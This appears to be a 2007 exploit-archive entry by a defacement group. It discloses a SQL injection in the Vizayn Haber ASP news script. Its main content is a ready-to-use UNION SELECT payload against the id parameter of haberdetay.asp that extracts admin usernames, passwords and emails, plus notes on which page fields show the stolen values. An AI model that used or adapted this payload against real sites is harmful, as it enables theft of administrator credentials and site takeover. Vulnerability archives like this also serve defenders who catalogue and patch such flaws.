Vizayn Haber (haberdetay.asp id variable) SQL Injection Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Vizayn Haber (haberdetay.asp id variable) SQL Injection Vulnerability
# Published : 2007-01-01
# Author : chernobiLe
# Previous Title : RBlog 1.0 (admin.mdb) Remote Password Disclosure Vulnerablity
# Next Title : autoDealer <= 2.0 (detail.asp iPro) Remote SQL Injection Vulnerability

###############################################################
#Vizayn Haber (tr) == (tr) SQL Injection Vulnerability
#Author : chernobiLe
#Site : www.cyber-sabotage.org , www.chernobiLe.com
#Contact: info@cyber-sabotage.org
###############################################################
#Risk : High
#Download Link Of Vizayn Haber : http://aspindir.com/goster/4623


#Exploit;
#Admin Nick, Passport, Mail;
http://[SITE]/haberdetay.asp?id=1+union+select+0,PASSWORD,EMAIL,USERNAME+from+ADMIN

#Union data Text;
#Haber Eklenme Tarihi :  USERNAME
#Haber Basligi :               PASSWORD

#Greetz: All CSDT ( Cyber Sabotage and Defacer ) TEAM

# www.Syue.com [2007-01-01]